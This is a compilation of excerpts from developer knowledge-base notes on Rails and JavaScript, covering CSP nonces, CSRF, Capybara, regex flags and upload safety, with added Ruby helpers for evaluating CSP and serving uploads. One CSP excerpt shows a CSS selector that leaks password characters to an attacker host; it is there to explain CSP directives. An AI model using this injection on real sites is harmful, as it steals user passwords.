...assets that we don't need allow_any_instance_of(ActionView::Base).to receive(:javascript_include_tag).and_return('script') allow_any_instance_of(ActionView::Base).to receive(:stylesheet_link...

...will have two CSRF tokens: a meta tag in the head. This is required so client-side JavaScript can make POST, PATCH and DELETE requests. A hidden input within each form. Since Rails 5 this token...

...lambda do |request| (request.session.id || SecureRandom.base64(16)).to_s end Then, find all occurrences of javascript_include_tag, javascript_tag, javascript_pack_tag etc. and add nonce: true. Also, make sure...

...don't have any other inline scripts in your application that do not use javascript_tag. Why this works The main point of this CSP is to disallow user content...

...prompt will have been closed already and cannot be brought back. Also, any JavaScript code placed after the alert will be executed. Automatically closing user prompts happens when performing...

...missing an href attribute. This will probably happen to you every now and then on JavaScript-heavy applications. An example would be an AngularJS application where the following HTML actually...

...link placeholders. So Capybara at least adheres to the HTML spec. :) See also Triggering JavaScript when an element is clicked Capybara can find links and fields by their [aria-label...

...RegExp to interpret text as Shift JIS encoded, which you probably don't want. JavaScript: Historically there was no modifier to make the dot match line feeds. You need to write...

...proposal (the s or "dotAll" flag, which has since been standardized in ES2018 and ships in all current engines). While there is a /m modifier in JavaScript, it only changes the meaning of ^ and $. Perl: You can make the dot match line...

...but the most important ones are: Sources: default-src: fallback for all other *-src directives; script-src: JavaScript; style-src: CSS; font-src: fonts; img-src: images; object-src: sources for plugins (e.g...

input[type="password"][value$="a"] { background-image: url("http://attacker.com/passwords-ends-with/a"); } Problem: some JavaScript libraries (editors etc.) use inline styles. object-src: also important. If it is not restricted, ...can...
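The two CSP passages above (the Rails nonce setup and its "why this works", and the directive list with the attribute-selector CSS exfiltration) come down to one browser decision per resource: does the directive for that resource kind list a source that matches it? The following is an added example, not code from the original cards or from Rails: a plain Ruby model of that decision, with an assumed helper for a per-response nonce, a policy builder in the spirit of the text, and a small evaluator. Only 'self', 'none', 'unsafe-inline' and nonce/hash sources are modelled; host and scheme allowlists are left out. One caveat on the generator lambda shown earlier: it falls back to a random value only when there is no session, so within a session every response carries the same nonce and the session identifier ends up in the page markup. A fresh SecureRandom.base64(16) per response, as generate_nonce does here, avoids both.

```ruby
require 'securerandom'

# Per-response nonce, the SecureRandom branch of the generator lambda above.
# (Assumed helper name, not from the original page.)
def generate_nonce
  SecureRandom.base64(16)
end

# A policy in the spirit of the text: scripts only with a matching nonce,
# stylesheets only from our own origin, no plugins at all.
def build_policy(nonce)
  {
    'default-src' => ["'self'"],
    'script-src'  => ["'self'", "'nonce-#{nonce}'"],
    'style-src'   => ["'self'"],
    'object-src'  => ["'none'"],
  }.map { |name, sources| "#{name} #{sources.join(' ')}" }.join('; ')
end

# Parse a Content-Security-Policy header value into directive => source list.
def parse_policy(header)
  header.split(';').each_with_object({}) do |directive, acc|
    name, *sources = directive.strip.split(/\s+/)
    acc[name] = sources if name
  end
end

# Simplified model of the browser's decision for one resource.
#   kind:        :script, :style, :object, :img, ... (selects the "<kind>-src" directive,
#                falling back to default-src)
#   inline:      true for an inline <script>/<style> element or attribute
#   nonce:       the element's nonce attribute, if any
#   same_origin: for external resources, whether the URL is on our own origin
def allowed?(header, kind:, inline: false, nonce: nil, same_origin: true)
  policy  = parse_policy(header)
  sources = policy.fetch("#{kind}-src") { policy.fetch('default-src', []) }
  return false if sources.include?("'none'")

  if inline
    return true if nonce && sources.include?("'nonce-#{nonce}'")
    # Once a directive carries a nonce or hash, browsers ignore 'unsafe-inline'
    # in that directive, so an injected <script> without the nonce stays blocked
    # even on a policy that still lists 'unsafe-inline' for old browsers.
    return false if sources.any? { |s| s.start_with?("'nonce-", "'sha256-", "'sha384-", "'sha512-") }
    return sources.include?("'unsafe-inline'")
  end

  # External resource: only 'self' is modelled here.
  same_origin && sources.include?("'self'")
end
```

Against build_policy(generate_nonce), a javascript_tag rendered with nonce: true is allowed, an injected inline <script> (no nonce, or a guessed one) is not, the password-exfiltrating <style> from the CSS snippet is not because style-src has no 'unsafe-inline' (which is exactly the trade-off with libraries that rely on inline styles), and an <object> is rejected outright by object-src 'none'.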

...redirect with GET as expected. This is also what Unpoly or the Rails unobtrusive JavaScript adapter does when you annotate a link with data-method="PATCH...

...using a tool like Unpoly you might want to set autocomplete="off" in the JavaScript that also initializes your date picker library: up.compiler('.date-picker', function(input) { input.setAttribute('autocomplete', 'off...

}) This way users with JavaScript disabled (and hence no calendar popups) will still get the browser's default autocomplete behavior...

...your footprint small. Check your JS bundles Webpack(er): Analyze the size of your JavaScript components

...event on window. It will be emitted for all uncaught errors in the current JavaScript VM: window.addEventListener('error', function(event) { console.log("Got an uncaught error: ", event.error) }) Tip Testing tools like...

...concept, like a Ruby class attribute (snake_case) that is also exposed to the JavaScript world (camelCase). # This query matches "foobar", "foo-bar" and "foo_bar" # The query is case...

When using the asset pipeline your assets (images, javascripts, stylesheets, fonts) live in folders inside app: app/assets/fonts app/assets/images app/assets/javascripts app/assets/stylesheets With the asset pipeline, you can use the...

...power of Ruby to generate assets. E.g. you can have ERB tags in your JavaScript. Or you can have an ERB template which generates Haml which generates HTML. You can...

Jasmine is a great way to unit test your JavaScript components without writing an expensive end-to-end test for every small requirement. After we integrated Jasmine into a Rails...


...attribute will become standard soon. Feel free to use it to feel future-proof. On JavaScript File objects, webkitRelativePath is supported similarly to webkitdirectory in HTML. As a fallback for older...


...E.g. console.log("Current string:", string, "Current number:", 12) Your output can have hyperlinks to JavaScript objects, e.g. console.log("Check out the current %o, it's great", location) Displaying tabular data...

...sometimes your application will explode with an error outside your control. Two examples: A JavaScript library references a source map in its build, but forgets to package the source map...

...for a multi-line text in your HTML. Earlier, it was necessary to implement JavaScript solutions like Superclamp.js to enable this because the browser support has been rather limited and...

Still, we recommend using the CSS approach whenever possible, since clamping in JavaScript has significant performance costs. Usage: display: -webkit-box overflow: hidden overflow-wrap: break-word

...Our primary concern here is users uploading .html or .svg files that can run JavaScript and possibly hijack another user's session. A secondary concern is that malicious users can...
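The concern above is an uploaded .html or .svg file that, when a victim opens it on the application's origin, runs script with that user's cookies. The usual mitigations are serving user uploads from a separate, cookie-less origin or, at minimum, sending them as downloads with a non-executable content type and no MIME sniffing. The following is an added example, not code from the original card: a plain Ruby helper (assumed name download_headers) that produces such response headers; the untrusted filename and declared content type are constructed inputs.

```ruby
# Content types a browser will render as a document on our origin and run
# script from if a user navigates to the file directly. (SVG runs script when
# opened as a document, not when embedded via <img>.)
ACTIVE_CONTENT_TYPES = %w[
  text/html application/xhtml+xml image/svg+xml text/xml application/xml
].freeze

# Response headers for sending one user upload back to a browser.
# filename and declared_type are what the uploader supplied; neither is trusted.
def download_headers(filename, declared_type)
  # Normalise "TEXT/HTML; charset=utf-8" to "text/html"
  type = declared_type.to_s.downcase.split(';').first.to_s.strip
  # Never let the browser treat an upload as an HTML/SVG/XML document
  type = 'application/octet-stream' if type.empty? || ACTIVE_CONTENT_TYPES.include?(type)
  # Keep the filename printable and free of path separators and quotes
  safe_name = filename.to_s.gsub(/[^\w.\-]/, '_')

  {
    'Content-Type'            => type,
    # attachment: the browser offers a download instead of rendering the file
    'Content-Disposition'     => %(attachment; filename="#{safe_name}"),
    # nosniff: do not guess a different type from the file's bytes
    'X-Content-Type-Options'  => 'nosniff',
    # defence in depth: if anything does render, it gets an opaque origin and no script
    'Content-Security-Policy' => "default-src 'none'; sandbox",
  }
end
```

The type list is deliberately an allow-nothing for active content rather than an extension check: a file named image.png uploaded with a text/html content type is the case that matters, and a sniffing browser is what nosniff is for.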

...want to track interactions that don't have a corresponding URL + request (e.g. a JavaScript button or a PDF download). Luckily the Analytics code snippet allows you to freely choose...

...disabled text field is not possible (copy & paste does not work)
- Firefox cancels any JavaScript events inside a fieldset[disabled]
readonly fields:
- post to the server
- get focus

...leading to validation errors and thus user confusion. We can fix all that with JavaScript:
const element = document.querySelector('#your-input')
// Number inputs allow incrementing/decrementing with arrow keys, and support exponential...

...jQuery cache even exists. After all, jQuery could simply attach event handlers to the JavaScript object that represents the DOM element. The reason for the existence of the jQuery cache...

...is that old versions of Internet Explorer could not garbage-collect JavaScript objects with circular references. For instance, the following object graph could not be reclaimed by old IE's...

...the required controller actions with @model.nested_model.build. If you are adding fields dynamically by using JavaScript, then the form helper method should take care of this: new_nested_record = f.object.send(nested...


timemachine.js allows you to mock the client's time by monkey-patching JavaScript core classes. We use timemachine.js in combination with the Timecop gem to synchronize the local...

...we see that Timecop is mocking the time:

- if defined?(Timecop) && Timecop.top_stack_item
  = javascript_include_tag "timemachine.js"
  :javascript
    timemachine.config({ dateString: #{Time.now.to_json}, tick: true })

Warning: timemachine.js will mock the...